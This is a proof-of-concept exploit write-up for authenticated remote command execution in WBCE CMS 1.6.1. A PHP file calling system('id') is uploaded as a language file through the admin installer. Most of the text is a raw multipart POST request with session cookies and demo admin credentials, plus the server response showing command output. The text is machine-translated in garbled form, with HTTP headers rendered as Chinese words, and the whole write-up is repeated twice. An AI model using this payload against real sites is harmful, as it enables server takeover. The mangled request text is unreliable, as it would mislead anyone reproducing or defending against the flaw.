#exploit title: WBCE CMS版本: 1.6.1远程命令执行
#日期: 30/11/2023
#利用作者: TMRSWRR
#供应商HomePage: https://wbce-cms.org/
#软件link: https://github.com/wbce/wbce_cms/archive/refs/tags/1.6.6.1.zip
#版本: 1.6.1
#测试在: https://www.softaculous.com/apps/cms/wbce_cms
## POC:
1)使用管理员来登录并单击“附加组件”
2)单击语言安装语言https://demos6.softaculous.com/wbce_cmsgn4fqnl8mv/admin/languages/index.php
3)上传升级.php?php echo系统('id');单击安装https://demos6.softaculous.com/wbce_cmsgn4fqnl8mv/admin/languages/install.php
4)您将看到ID命令结果
结果:
uid=1000(soft)gid=1000(soft)组=1000(soft)uid=1000(soft)gid=1000(soft)组=1000(soft)
###邮政请求:
post/wbce_cmsgn4fqnl8mv/admin/languages/install.php http/1.1
HOST: DEMOS6.SOFTACULOUL.COM
cookie: _ga_yydpz3nxqq=gs1.1.1.1701347353.1.1.1.1701349000.0.0.0; _GA=GA1.1.1562523898.1701347353; aefcookies1526 [aefsid]=jefkds0yos40w5jpbhl6ue9tsbo2yhiq; demo_390=%7B%22sid%22%3A390%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22pass%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos4.softaculous.com%5C%2FIpressPagesgw upshhfxk%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2Fdemos4.softaculous.com%5C%2FIpressPagesgwupshhfxk%5C%2Fadmin.php%22%2C%22dir_suffix%22%3A%22gwupshhfxk%22%7D; demo_549=%7B%22SID%22%3A549%2C%22%22%22%22%22AdAdmin%22%22%2C%2C%22 adpass%22%22%3A%22Password%22%2C%2C%22 url%22%22%22%3A%3A%22https%22https%3A%3A%3A%3A%5C%2f%2F%2F%5C%2fdem.com.com.softbbl; YBUXQTHEW%22%2C%22ADMINURL%22%3A%22HTTPS%3A%5C%2F%2F%5C%2Femos1.softaculous.com%5C%2FBluditBluditBluditBludItbyBuxqThew%5C%5C%5C%2fadmin%2fadmin%5C%2F%2F%2F%2C%2C%22%22%22%22%22%22%22%22%22%22%22%3A demo_643=%7B%22sid%22%3A643%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22password%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos6.softaculous.com%5C%2FWBCE_C MSGN4FQNL8MV%22%2C%22Adminurl%22%3A%22HTTPS%3A%5C%2F%2F%5C%2fdemos6.softaculy.com %5C%2FWBCE_CMSGN4FQNL8MV%5C%2FADMIN%22%2C%22DIR_SUFFIX%22%3A%22GN4FQNL8MV%22%22%7D; phpsessid-5505-sid=576D8B8DD92F6CABE3A235CB359C9B34; wbcelastConnectjs=1701349503; stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue% 3anoclass%5D%23%5BID%3A4%5D%5D%5DBVALUE%3anoclass%5D%23%5BID%3A5%5D%5D%5BVALUE%3anoclas s%5D%23%5BID%3A5%5D%5D%3Anoclass%5D%23%5BID%3A6%5D%5D%5DBVALUE%3anoclass%5D%233
用户代理: Mozilla/5.0(Windows NT 10.0; RV:109.0)壁虎/20100101 Firefox/115.0
ACCEPT:文本/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,/; q=0.8
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,放气
Referer: https://demos6.softaculous.com/wbce_cmsgn4fqnl8mv/admin/languages/index.php
content-type:多部分/form-data;边界=--------------------------------- 86020911415982314764024459
内容长度: 522
Origin: https://demos6.softaculous.com
DNT: 1
升级- 不肯定- requests: 1
sec-fetch-Dest:文档
sec-fetch mode:导航
sec-fetch-site:相同原产
sec-fetch-user:1
TE:拖车
连接:关闭
-------------------------------------------- 86020911415982314764024459
content-disposition: form-data;名称='formtoken'
5D3C9CEF-003AAA0A62E1196EBDA16A7AAB9A0CF881B9370C
-------------------------------------------- 86020911415982314764024459
content-disposition: form-data; name='userfile';文件名='upgrade.php'
content-type:应用程序/x-php
php回声系统('id');
-------------------------------------------- 86020911415982314764024459
content-disposition: form-data;名称='提交'
----------------------------------------------- 86020911415982314764024459-
###响应:
! - ##################################
!
div class='row'style='Overflow:Visible'
DIV类='FG12'
表ID='前_positioning_table'
tr
TD类='content'
uid=1000(soft)gid=1000(软)组=1000(soft)
uid=1000(soft)gid=1000(软)组=1000(soft)
div class='top alertbox_error fg12 error-box'
我class='fa fa-2x fa-warning信号'/i
Pinvalid WBCE CMS语言文件。请检查文本文件。/P
pa href='index.php'class='button'back
#日期: 30/11/2023
#利用作者: TMRSWRR
#供应商HomePage: https://wbce-cms.org/
#软件link: https://github.com/wbce/wbce_cms/archive/refs/tags/1.6.6.1.zip
#版本: 1.6.1
#测试在: https://www.softaculous.com/apps/cms/wbce_cms
## POC:
1)使用管理员来登录并单击“附加组件”
2)单击语言安装语言https://demos6.softaculous.com/wbce_cmsgn4fqnl8mv/admin/languages/index.php
3)上传升级.php?php echo系统('id');单击安装https://demos6.softaculous.com/wbce_cmsgn4fqnl8mv/admin/languages/install.php
4)您将看到ID命令结果
结果:
uid=1000(soft)gid=1000(soft)组=1000(soft)uid=1000(soft)gid=1000(soft)组=1000(soft)
###邮政请求:
post/wbce_cmsgn4fqnl8mv/admin/languages/install.php http/1.1
HOST: DEMOS6.SOFTACULOUL.COM
cookie: _ga_yydpz3nxqq=gs1.1.1.1701347353.1.1.1.1701349000.0.0.0; _GA=GA1.1.1562523898.1701347353; aefcookies1526 [aefsid]=jefkds0yos40w5jpbhl6ue9tsbo2yhiq; demo_390=%7B%22sid%22%3A390%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22pass%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos4.softaculous.com%5C%2FIpressPagesgw upshhfxk%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2Fdemos4.softaculous.com%5C%2FIpressPagesgwupshhfxk%5C%2Fadmin.php%22%2C%22dir_suffix%22%3A%22gwupshhfxk%22%7D; demo_549=%7B%22SID%22%3A549%2C%22%22%22%22%22AdAdmin%22%22%2C%2C%22 adpass%22%22%3A%22Password%22%2C%2C%22 url%22%22%22%3A%3A%22https%22https%3A%3A%3A%3A%5C%2f%2F%2F%5C%2fdem.com.com.softbbl; YBUXQTHEW%22%2C%22ADMINURL%22%3A%22HTTPS%3A%5C%2F%2F%5C%2Femos1.softaculous.com%5C%2FBluditBluditBluditBludItbyBuxqThew%5C%5C%5C%2fadmin%2fadmin%5C%2F%2F%2F%2C%2C%22%22%22%22%22%22%22%22%22%22%22%3A demo_643=%7B%22sid%22%3A643%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22password%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos6.softaculous.com%5C%2FWBCE_C MSGN4FQNL8MV%22%2C%22Adminurl%22%3A%22HTTPS%3A%5C%2F%2F%5C%2fdemos6.softaculy.com %5C%2FWBCE_CMSGN4FQNL8MV%5C%2FADMIN%22%2C%22DIR_SUFFIX%22%3A%22GN4FQNL8MV%22%22%7D; phpsessid-5505-sid=576D8B8DD92F6CABE3A235CB359C9B34; wbcelastConnectjs=1701349503; stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue% 3anoclass%5D%23%5BID%3A4%5D%5D%5DBVALUE%3anoclass%5D%23%5BID%3A5%5D%5D%5BVALUE%3anoclas s%5D%23%5BID%3A5%5D%5D%3Anoclass%5D%23%5BID%3A6%5D%5D%5DBVALUE%3anoclass%5D%233
用户代理: Mozilla/5.0(Windows NT 10.0; RV:109.0)壁虎/20100101 Firefox/115.0
ACCEPT:文本/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,/; q=0.8
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,放气
Referer: https://demos6.softaculous.com/wbce_cmsgn4fqnl8mv/admin/languages/index.php
content-type:多部分/form-data;边界=--------------------------------- 86020911415982314764024459
内容长度: 522
Origin: https://demos6.softaculous.com
DNT: 1
升级- 不肯定- requests: 1
sec-fetch-Dest:文档
sec-fetch mode:导航
sec-fetch-site:相同原产
sec-fetch-user:1
TE:拖车
连接:关闭
-------------------------------------------- 86020911415982314764024459
content-disposition: form-data;名称='formtoken'
5D3C9CEF-003AAA0A62E1196EBDA16A7AAB9A0CF881B9370C
-------------------------------------------- 86020911415982314764024459
content-disposition: form-data; name='userfile';文件名='upgrade.php'
content-type:应用程序/x-php
php回声系统('id');
-------------------------------------------- 86020911415982314764024459
content-disposition: form-data;名称='提交'
----------------------------------------------- 86020911415982314764024459-
###响应:
! - ##################################
!
div class='row'style='Overflow:Visible'
DIV类='FG12'
表ID='前_positioning_table'
tr
TD类='content'
uid=1000(soft)gid=1000(软)组=1000(soft)
uid=1000(soft)gid=1000(软)组=1000(soft)
div class='top alertbox_error fg12 error-box'
我class='fa fa-2x fa-warning信号'/i
Pinvalid WBCE CMS语言文件。请检查文本文件。/P
pa href='index.php'class='button'back